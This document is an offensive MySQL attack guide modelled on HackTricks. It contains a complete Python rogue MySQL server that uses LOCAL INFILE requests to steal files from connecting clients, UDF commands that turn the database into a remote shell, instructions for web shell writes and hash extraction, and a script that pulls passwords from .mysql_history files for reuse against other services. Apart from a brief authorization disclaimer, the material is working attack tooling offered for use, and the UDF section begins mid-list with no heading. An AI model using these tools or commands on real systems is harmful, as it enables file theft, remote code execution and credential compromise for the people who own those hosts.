Mysql Hacktricks Verified


This is a classic that is often overlooked. If you can get an admin's client tooling or an application server to connect to a MySQL server you control, you can read arbitrary files from the client machine.

How it works (verified):
The attack runs LOAD DATA LOCAL INFILE backwards. Normally the client issues that statement and the server replies by asking for the named file, but the protocol never ties the server's request to what the client actually sent. Your fake server therefore accepts any credentials, waits for the client's first query, and answers it with a LOCAL INFILE request naming the file you want. Vulnerable clients (e.g., old PHP mysqli with allow_local_infile=ON, MySQL Workbench, or outdated connectors) then send back any file the client's OS user can read.

Automation: use RogueMySQL or mysql-fake-server. Beneath the tooling, the whole trick is one server-side packet. After accepting any login, the fake server answers the client's first query (whatever SQL it was) with:

-- Your malicious server sends, in place of a result set:
0xFB followed by the file name, e.g. 0xFB '/etc/passwd'

The client replies with the file contents in one or more packets and an empty packet to mark the end of the file; nothing in the protocol checks that the file has anything to do with the query the client issued. On the client side the fix is to disable local infile (mysql --local-infile=0, mysqli.allow_local_infile=0; MySQL 8.0 client libraries default it to off).

The technique is most useful when the target reaches out to a database host you control: a connection string or DNS name you can influence, or an admin or backup tool pointed at your listener.
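As an added example (not HackTricks' code and not either of the tools named above), here is a minimal rogue server together with a constructed stand-in for a client that has local infile enabled, so the full exchange runs on loopback. The packet layout follows the MySQL wire protocol (3-byte length, 1-byte sequence id, payload; a LOCAL INFILE request is 0xFB plus the file name). The vulnerable_client function and its in-memory fake filesystem are assumptions that model a real connector's behaviour; they are not a real client.

```python
import socket
import struct
import threading

# -- MySQL packet framing: 3-byte little-endian length, 1-byte sequence id, payload
def packet(seq, payload):
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload

def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_packet(sock):
    """Return (sequence id, payload) of the next packet on the socket."""
    header = recv_exact(sock, 4)
    return header[3], recv_exact(sock, int.from_bytes(header[:3], "little"))

# -- Server-side messages
def greeting():
    """HandshakeV10 with a fixed salt; advertises CLIENT_LOCAL_FILES (0x80)."""
    salt = b"A" * 20
    caps = 0x80 | 0x200 | 0x8000 | 0x80000  # LOCAL_FILES|PROTOCOL_41|SECURE_CONNECTION|PLUGIN_AUTH
    payload = (b"\x0a" + b"5.7.99-rogue\x00" + struct.pack("<I", 1) + salt[:8] + b"\x00"
               + struct.pack("<H", caps & 0xFFFF) + b"\x21" + struct.pack("<H", 2)
               + struct.pack("<H", caps >> 16) + b"\x15" + b"\x00" * 10
               + salt[8:] + b"\x00" + b"mysql_native_password\x00")
    return packet(0, payload)

def ok_packet(seq):
    return packet(seq, b"\x00\x00\x00\x02\x00\x00\x00")  # OK, 0 rows, autocommit status

def local_infile_request(seq, path):
    return packet(seq, b"\xfb" + path.encode())           # 0xFB + file name, no terminator

def handle_client(conn, path):
    """Rogue server side of one connection; returns whatever file bytes the client sends."""
    conn.sendall(greeting())
    seq, _login = recv_packet(conn)          # HandshakeResponse: accept any credentials
    conn.sendall(ok_packet(seq + 1))
    seq, query = recv_packet(conn)           # first COM_QUERY (0x03) from the client
    if not query or query[0] != 0x03:
        return b""
    conn.sendall(local_infile_request(seq + 1, path))   # ignore the SQL, ask for the file
    stolen = b""
    while True:                              # file content packets end with an empty packet
        seq, chunk = recv_packet(conn)
        if not chunk:
            break
        stolen += chunk
    conn.sendall(ok_packet(seq + 1))
    return stolen

# -- Constructed stand-in for a client built with local_infile enabled (assumption)
def vulnerable_client(host, port, query, fake_fs):
    """Obeys any LOCAL INFILE request; `fake_fs` stands in for open() on the client box."""
    with socket.create_connection((host, port)) as s:
        recv_packet(s)                                    # greeting
        s.sendall(packet(1, b"\x00" * 32 + b"user\x00"))  # throwaway HandshakeResponse
        recv_packet(s)                                    # OK: "authenticated"
        s.sendall(packet(0, b"\x03" + query.encode()))    # COM_QUERY
        seq, resp = recv_packet(s)
        if resp[:1] == b"\xfb":                           # server wants a local file
            data = fake_fs.get(resp[1:].decode(), b"")
            if data:
                seq += 1
                s.sendall(packet(seq, data))
            s.sendall(packet(seq + 1, b""))               # empty packet = end of file
            recv_packet(s)                                # final OK

def demo(path="/etc/passwd"):
    """Run rogue server and vulnerable client on loopback; return the exfiltrated bytes."""
    fake_fs = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}  # constructed sample
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    result = {}

    def serve():
        conn, _ = srv.accept()
        with conn:
            result["data"] = handle_client(conn, path)

    t = threading.Thread(target=serve)
    t.start()
    vulnerable_client("127.0.0.1", srv.getsockname()[1], "SELECT 1", fake_fs)
    t.join()
    srv.close()
    return result["data"]

if __name__ == "__main__":
    print(demo().decode())
```

Note what the server never does: it does not parse the SQL at all. The client sent SELECT 1 and got back a request for /etc/passwd, which is exactly why a connector that trusts the server's LOCAL INFILE request is unsafe against a host it does not control.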


  • Execution (needs the FILE privilege, secure_file_priv not blocking the write, and the library first dropped into the directory named by the plugin_dir variable with SELECT ... INTO DUMPFILE, since the server only loads UDF libraries from there):
    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
    SELECT sys_eval('whoami');
    
  • This effectively turns the database into a remote shell running as the mysqld OS user (sys_eval returns the command's output; sys_exec from the same library returns only the exit code), and it works even when file system restrictions stop you from writing a web shell into the web root.


    Always check that you are authorized: these verified techniques are part of the HackTricks MySQL Methodology and must only be run against systems you have permission to test.

    On HackTricks, "verified" methods are those that have been tested and confirmed to work under specific configurations. The main areas covered:

    1. Enumeration and Information Gathering

    Before any exploit, identify the environment. HackTricks outlines how to verify:

    Version & User: SELECT version(); and SELECT user();.

    Privileges: whether the current user has the FILE privilege or administrative rights, via SELECT * FROM mysql.user (or SHOW GRANTS for the current user). Read secure_file_priv and plugin_dir at the same time, since they decide whether the file and UDF techniques below are possible at all.

    Database Structure: map tables and columns with information_schema.

    2. Exploitation Techniques

    Verified methods for gaining deeper access include:

    SQL Injection (SQLi): payloads for Union-based, Error-based, and Blind SQL injection to extract data.

    Reading/Writing Files: if the secure_file_priv variable is empty (an empty string; NULL disables file operations entirely and a directory value confines them to it) and the user holds the FILE privilege, LOAD DATA INFILE, LOAD_FILE(), and SELECT ... INTO OUTFILE / DUMPFILE can read sensitive system files (such as /etc/passwd) or write a web shell. Reads and writes happen as the mysqld OS user, so that account's filesystem permissions are the real limit.

    User Defined Functions (UDF): a verified path to privilege escalation and RCE, where a malicious shared library is written into plugin_dir and loaded with CREATE FUNCTION ... SONAME to execute operating-system commands.

    3. Common Authentication Bypasses

    HackTricks documents known vulnerabilities in older or misconfigured versions, such as the MySQL Authentication Bypass (CVE-2012-2122), where affected builds let a user log in with any password by simply retrying the connection: the password check truncated memcmp()'s return value to a char, so roughly one attempt in 256 was accepted.

    4. Post-Exploitation

    Once access is gained, verified steps include: extracting password hashes from mysql.user; searching for sensitive data such as API keys or personal information; checking for cleartext credentials in configuration files.

    For the most up-to-date and specific payloads, the MySQL page on HackTricks is the primary technical reference for these "verified" methods.


    Client-side history is worth reading too: the mysql client records every statement typed at its prompt, including CREATE USER ... IDENTIFIED BY and SET PASSWORD, so look for it under each user's home directory.

    cat ~/.mysql_history
    /home/user/.mysql_history
    /root/.mysql_history
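An added example of working through a recovered history file (not HackTricks' code): it pulls user, host and password out of the statement forms that embed a literal password. The sample history is constructed, and the unescaping step assumes the encoding some mysql client versions use when writing history (octal \NNN for spaces and control characters, a literal \n for newlines inside a statement); on a file that is plain text it is a no-op.

```python
import re

# Statement shapes that carry a literal password; each yields (user, host, password).
CREDENTIAL_PATTERNS = [
    # CREATE USER / ALTER USER 'u'@'h' IDENTIFIED [WITH plugin] BY 'p'
    re.compile(r"(?:CREATE|ALTER)\s+USER\s+(?:IF\s+NOT\s+EXISTS\s+)?"
               r"'([^']+)'@'([^']+)'\s+IDENTIFIED\s+(?:WITH\s+\S+\s+)?BY\s+'([^']*)'", re.I),
    # GRANT ... TO 'u'@'h' IDENTIFIED BY 'p'  (pre-8.0 syntax, still common in old history)
    re.compile(r"GRANT\s.*?\sTO\s+'([^']+)'@'([^']+)'\s+IDENTIFIED\s+BY\s+'([^']*)'", re.I),
    # SET PASSWORD FOR 'u'@'h' = PASSWORD('p')  or  = 'p'
    re.compile(r"SET\s+PASSWORD\s+FOR\s+'([^']+)'@'([^']+)'\s*=\s*(?:PASSWORD\()?'([^']*)'", re.I),
]

def unescape_history_line(line):
    """Undo the escaping some mysql client versions apply when writing history
    (assumption: octal \\NNN for spaces/control characters, literal \\n for newlines)."""
    line = re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), line)
    return line.replace("\\n", " ").replace("\n", " ").strip()

def extract_credentials(history_text):
    """Return [(user, host, password), ...] for every credential-bearing statement."""
    found = []
    for raw in history_text.splitlines():
        stmt = unescape_history_line(raw)
        for pat in CREDENTIAL_PATTERNS:
            m = pat.search(stmt)
            if m:
                found.append(m.groups())
                break
    return found

# Constructed sample history; nothing here comes from a real host.
SAMPLE_HISTORY = r"""select version();
CREATE USER 'deploy'@'%' IDENTIFIED BY 'Sup3rS3cret!';
GRANT ALL ON app.* TO 'app'@'10.0.0.5' IDENTIFIED BY 'app_pw_2019';
SET\040PASSWORD\040FOR\040'root'@'localhost'\040=\040PASSWORD('oldstyle');
ALTER USER 'reporter'@'localhost'\nIDENTIFIED WITH mysql_native_password BY 'rep0rt';
select count(*) from information_schema.tables;
"""

if __name__ == "__main__":
    for user, host, pw in extract_credentials(SAMPLE_HISTORY):
        print(f"{user}@{host}: {pw}")
```

Run it against a real file with extract_credentials(open(path).read()). Anything it returns is a live credential to try against the server itself and, given how often passwords are reused, against the host's other services.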